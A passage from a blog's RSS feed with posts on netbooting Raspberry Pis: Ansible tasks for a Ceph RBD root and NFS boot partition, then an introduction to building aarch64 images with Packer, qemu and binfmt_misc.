</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/resolv.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">content</span>: <span style="color:#e6db74">&#34;nameserver 1.1.1.1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install NFS tools</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nfs-common</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">no</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span></code></pre></div><p>The DNS server setup here is necessary because we&rsquo;re working in a chroot, not
an actual VM. Hence, no DNS servers were configured via DHCP.</p>
<p>This needs to be undone in a later task, as <code>/etc/resolv.conf</code> is normally a
symlink from systemd which points to a file under <code>/run</code> instead of being a
normal file.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">replace temporary resolv.conf with correct symlink</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">file</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/resolv.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">/run/systemd/resolve/resolv.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">link</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">force</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span></code></pre></div><h2 id="configuring-the-netboot-files">Configuring the netboot files</h2>
<p>The following tasks configure netbooting and all necessary files to accomplish
it, most importantly the changes in the initramfs scripting to add the capability
to mount a Ceph RBD based root disk:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add rbd boot hook</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">images/files/rbd-gen-hook.sh</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/initramfs-tools/hooks/rbd-gen-hook.sh</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;0644&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add rbd boot script</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">images/files/rbd-boot-script.sh</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/initramfs-tools/scripts/rbd</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;0644&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span></code></pre></div><p>The two script files, <code>rbd-boot-script.sh</code> and <code>rbd-gen-hook.sh</code> can be found
in <a href="https://gist.github.com/mmeier86/97d8d55073ebcd4c832d7cc8a76241e7">this Gist</a>.</p>
<p>Next, the initramfs update itself is run:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backup flash-kernel initramfs gen hook</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/tmp/initd-flash-kernel.sh.bak</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remote_src</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">/etc/initramfs/post-update.d/flash-kernel</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">temporarily delete flash-kernel initramfs hook</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">file</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/initramfs/post-update.d/flash-kernel</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">absent</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install linux-modules-extra to get rbd kernel module</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">linux-modules-extra-raspi</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">restore flash-kernel initramfs gen hook</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">/tmp/initd-flash-kernel.sh.bak</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remote_src</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/initramfs/post-update.d/flash-kernel</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">copy initrd to firmware partition</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">/boot/initrd.img</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/boot/firmware/initrd.img</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remote_src</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span></code></pre></div><p>The procedure here is a little bit more complicated. This is due, again, to the
fact that we are not in a netbooted VM, but in a chroot. This confuses the kernel
flashing tool <code>flash-kernel</code>, which is used to update the kernel on <code>/boot/firmware</code>.
It gets confused because it is not able to determine the running system&rsquo;s type.</p>
<p>The main problem here is the install of the <code>linux-modules-extra-raspi</code> package.
This package is necessary to get the <code>rbd</code> kernel module, which in turn is needed
to be able to mount the Ceph RBD root partition during the initramfs phase of
the boot.
To work around this problem, the configuration which runs the <code>flash-kernel</code> tool
at the end of an <code>initramfs-update</code> run is temporarily removed and restored after
the initramfs has been updated as part of the <code>linux-modules-extra-raspi</code> install.</p>
<p>Finally, the new image needs to be copied to the <code>/boot/firmware</code> directory
manually, because of the previously described switch off of the <code>flash-kernel</code>
tool.</p>
<h2 id="setup-boot-partition">Setup boot partition</h2>
<p>The next two tasks set up the new, NFS based boot partition:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">remove old boot partition mount</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">lineinfile</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/fstab</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#34;.*/boot/firmware.*&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">absent</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add NFS based boot partition</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mount</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;{{ &#39;/boot/firmware&#39; if hn_pi is defined else &#39;/boot&#39;  }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#e6db74">&#34;nfs-host:/picluster-boot/hn_host_id if hn_pi is defined else hn_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fstype</span>: <span style="color:#ae81ff">nfs</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">opts</span>: <span style="color:#ae81ff">defaults,timeo=900,_netdev</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span></code></pre></div><p>This is reasonably simple. Each Pi gets it&rsquo;s own directory on the NFS mount,
which is defined by the Pi&rsquo;s serial number (see <code>cat /proc/cpuinfo</code>) and also
used in the netboot setup.</p>
<h2 id="setting-the-kernel-command-line">Setting the kernel command line</h2>
<p>In Raspberry Pi&rsquo;s, the kernel command line is defined in a file in <code>/boot/firmware/cmdline.txt</code>.</p>
<p>In the following task, this file is adapted to add the necessary parameters
for netbooting from a Ceph RBD volume:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add rbd boot kernel command line arguments Pi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replace</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/boot/firmware/cmdline.txt</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#39;(^dwc_otg.lpm_enable=0.*)$&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replace</span>: <span style="color:#e6db74">&#39;\1 boot=rbd rbdroot=10.0.0.15,10.0.0.12,10.0.0.14:clusteruser:{{ hn_ceph_key }}:pi-cluster:{{ hn_hostname }}::_netdev,noatime&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span></code></pre></div><p>These parameters are not actually used by the kernel, but forwarded to the
<code>init</code> binary the kernel calls after it is done with early initialization. When
an initramfs is used, this <code>init</code> binary is actually a shell script which
will mount the real root partition and then load the <code>init</code> binary from that
partition.</p>
<p>The meaning of the parameters is described in detail in my <a href="https://blog.mei-home.net/posts/rpi-netboot/initramfs/#booting-from-a-ceph-rbd-volume">previous post</a> on setting up the initramfs.</p>
<h2 id="final-little-housekeeping">Final little housekeeping</h2>
<p>The last task in the playbook does another necessary piece of housekeeping, this
time for permissions:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Add post kernel install chmod</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">images/files/zzz-chmod-kernel-image</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/kernel/postinst.d/zzz-chmod-kernel-image</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;0755&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span></code></pre></div><p>The <code>zzz-chmod-kernel-image</code> file can also be found in the <a href="https://gist.github.com/mmeier86/97d8d55073ebcd4c832d7cc8a76241e7">GitHub Gist</a>.</p>
<p>This task installs a small script which will <code>chmod</code> the kernel image to be world
readable. This is necessary because otherwise, the TFTP server serving the kernel
image at boot time will not be able to access it, leading to a failed boot.</p>
<p>This concludes the walk through my bootstrapping playbook. Putting all of these
tasks together into a playbook and running the Packer image template from
<a href="https://blog.mei-home.net/posts/rpi-netboot/image/">Part IV of this series</a> should net you
a Raspberry Pi image for booting from NFS as the boot partition and a Ceph RBD
volume as the root partition.</p>
<p>The next and final article in the series will be a short one about actually
deploying the image.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Netboot Raspberry Pi Part IV: Using Packer and Ansible to create a Raspberry Pi Ubuntu Netboot Image</title>
      <link>https://blog.mei-home.net/posts/rpi-netboot/image/</link>
      <pubDate>Sat, 24 Sep 2022 01:49:00 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/rpi-netboot/image/</guid>
      <description>How to create a netbootable Ubuntu image for the Raspberry Pi 4</description>
      <content:encoded><![CDATA[<p>This is the fourth part of the Pi netboot series. Find the previous
parts from the introductory article <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">here</a>.</p>
<p>In this part of the series, I will go over using a combination of
<a href="https://www.packer.io/">HashiCorp Packer</a> and <a href="https://www.ansible.com/">Ansible</a>
to create an Ubuntu Linux image for a netbootable Raspberry Pi, using NFS for the
boot partition and a Ceph RBD as the root device.</p>
<p>The goal here is to show you how to set up Packer and what configuration is needed to
run an Ansible playbook in an <em>aarch64</em> image on a <em>x86_64</em> machine. While writing
the article, I realized that it had already gotten pretty long, so I will move
the description of the Ansible playbook as well as the final image deployment
to future articles.</p>
<h1 id="what-is-packer">What is Packer?</h1>
<p>HashiCorp&rsquo;s Packer is a tool to conveniently and repeatably create OS images.
It is mostly intended to create VM images for big cloud provider&rsquo;s setups, but
it serves very well for image creation for Raspberry Pis as well, as I have
found.</p>
<p>The idea is to provide a base image, like in this case Ubuntu&rsquo;s Raspberry Pi
image, and then allow the user to define provisioning steps. These steps can be
executed for example as shell scripts or Ansible playbooks.
Packers task is to actually launch the image and execute the <em>provider</em> in
it.</p>
<p>This does not just work for VM images, but also for example as a build tool for
Docker images.</p>
<p>An example Packer file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">packer</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">required_plugins</span> {
</span></span><span style="display:flex;"><span>    docker <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      version <span style="color:#f92672">=</span> &#34;&gt;<span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>.<span style="color:#ae81ff">0</span>.<span style="color:#ae81ff">7</span><span style="color:#960050;background-color:#1e0010">&#34;</span>
</span></span><span style="display:flex;"><span>      source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;github.com/hashicorp/docker&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">source</span> <span style="color:#e6db74">&#34;docker&#34; &#34;ubuntu&#34;</span> {
</span></span><span style="display:flex;"><span>  image  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu:xenial&#34;</span>
</span></span><span style="display:flex;"><span>  commit <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">build</span> {
</span></span><span style="display:flex;"><span>  name    <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;learn-packer&#34;</span>
</span></span><span style="display:flex;"><span>  sources <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;source.docker.ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">provisioner</span> <span style="color:#e6db74">&#34;shell&#34;</span> {
</span></span><span style="display:flex;"><span>    environment_vars <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;FOO<span style="color:#f92672">=</span><span style="color:#66d9ef">hello</span> <span style="color:#66d9ef">world</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>    inline <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;echo Adding file to Docker Container&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;echo \&#34;FOO is $FOO\&#34; &gt; example.txt&#34;</span>,
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Here, the <code>source</code> describes the virtualization to use (Docker in this case)
and the source image. The <code>build</code> block then describes what to do once the
image (in this case a Docker container) has been launched. In this example,
a file is created in the Docker image.</p>
<p>To actually build the image, first the workspace has to be initialized by
running <code>packer init .</code> in your working directory.
Then, execute the build, assuming the above example was pasted into a file
<code>docker-ubuntu.pkr.hcl</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>packer build docker-ubuntu.pkr.hcl
</span></span></code></pre></div><p>This is a pretty simple example, just requiring Docker to be set up. So what
hoops do you have to jump through to run an <code>aarch64</code> image and execute things
(like the bash script in the previous example) in it?</p>
<h1 id="running-aarch64-images-with-qemu-and-binfmt_misc">Running aarch64 images with Qemu and binfmt_misc</h1>
<p>Our goal is to provision an image for a Raspberry Pi - notionally, not an
x86_64 host. So how to do that on our (mostly, these days?) amd64 daily drivers?</p>
<p>The answer: <a href="https://www.qemu.org/">Qemu</a>. In combination with the extremely
cool <em>binfmt_misc</em> Linux kernel feature.</p>
<p>Learning about this feature was another one of those <em>Whoa, Linux is so cool!</em>
moments for me.</p>
<p>To begin with, let&rsquo;s quote <a href="https://docs.kernel.org/admin-guide/binfmt-misc.html">the kernel docs</a>
again:</p>
<blockquote>
<p>This Kernel feature allows you to invoke almost (for restrictions see below) every program by simply typing its name in the shell. This includes for example compiled Java(TM), Python or Emacs programs.</p></blockquote>
<p>(I only now realized that this doesn&rsquo;t just work for Qemu stuff, but seemingly
also for e.g. Java progs&hellip;)</p>
<p>So what it allows you to do is this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>wget https://releases.hashicorp.com/packer/1.8.3/packer_1.8.3_linux_arm64.zip
</span></span><span style="display:flex;"><span>unzip packer_1.8.3_linux_arm64.zip
</span></span><span style="display:flex;"><span>./packer version
</span></span></code></pre></div><p>And it will work. You will be able to execute aarch64 binaries without having
to prefix them with anything, let alone fire up an entire VM.</p>
<p>To configure <code>binfmt_misc</code>, first install <code>qemu</code> on the host. It is important
to ensure that static user binaries are enabled. In Gentoo, this is done with
the <code>static-user</code> use flag. In Debian, install the <code>qemu-user-static</code> package.
This is needed because the qemu binary will later be copied into the chroot of
whatever image you chose to use. And that image&rsquo;s shared libraries might be
wildly different than those installed on the system where you&rsquo;re running Packer.
A static binary just makes life simpler here.</p>
<p>Next, the binary formats need to be configured, so the kernel knows how to run
a binary with a specific format. This is done through configuration in
<code>/proc/sys/fs/binfmt_misc/</code> files. On my Gentoo host, the file <code>/proc/sys/fs/binfmt_misc/qemu-aarch64</code>
looks like this:</p>
<pre tabindex="0"><code>enabled
interpreter /usr/bin/qemu-aarch64
flags: OC
offset 0
magic 7f454c460201010000000000000000000200b700
mask ffffffffffffff00fffffffffffffffffeffffff
</code></pre><p>These files can be registered automatically, normally by an init system and
depending on the distribution.</p>
<p>You can test whether you configured everything correctly by downloading any
<code>aarch64</code> binary and trying to execute it on your host.</p>
<p>With this prerequisite fulfilled, we can continue to setup Packer itself.</p>
<h1 id="packer-setup">Packer setup</h1>
<p>Setting up Packer itself is pretty simple, as it is only a single Go binary.
You can either install it from your distro&rsquo;s package manager or download the
binary directly from <a href="https://www.packer.io/downloads">here</a> and move it to
someplace in your <code>$PATH</code>.</p>
<p>While Packer supports an <code>init</code> command, it is not required for our purposes.
Instead, we will manually install the <code>packer-builder-arm</code> plugin. This plugin
allows us to run image creation for aarch64 images via <code>chroot</code>.
The plugin can be found at <a href="https://github.com/mkaczanowski/packer-builder-arm">mkaczanowski/packer-builder-arm</a>.</p>
<p>As there are no binaries provided, the repository needs to be checked out and
build. This can be done with the following sequence of commands in the current
directory:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>git clone https://github.com/mkaczanowski/packer-builder-arm packer-builder-arm-src
</span></span><span style="display:flex;"><span>cd packer-builder-arm-src
</span></span><span style="display:flex;"><span>go mod download
</span></span><span style="display:flex;"><span>go build
</span></span></code></pre></div><p>This will create a <code>packer-builder-arm</code> executable. Copy that executable to your
future Packer workspace. If you would like to store the plugin in a more central
place, you can follow the instructions in the <a href="https://www.packer.io/docs/configure#packer-s-plugin-directory">Packer config</a> on the plugin directory.</p>
<p>And with that, the setup is finally complete and we can get to the image creation
itself.</p>
<h1 id="finally-the-image-creation">Finally: The image creation</h1>
<p>To create images, Packer uses image template files. These template files are
described <a href="https://www.packer.io/docs/templates">here</a>, but in most cases, the
options are dictated by the builder and provisioners you are using.</p>
<p>Without further ado, here is the template file for my Raspberry Pi images. The
template supports both, images for netboot and images for hosts with a local
disc.</p>
<p>Don&rsquo;t be overwhelmed, I will go through the different sections piece by piece. &#x1f609;</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_hostname&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">string</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Hostname for the machine which uses this image.&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_netboot&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">bool</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Should the host netboot or should it boot from a local disk?&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_host_id&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">string</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ID of the raspberry pi&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;mountpath&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/tmp/packer-${uuidv4()}&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;foobar-pw&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>(<span style="color:#e6db74">&#34;secret/foobar&#34;, &#34;pw&#34;</span>)
</span></span><span style="display:flex;"><span>  sensitive <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
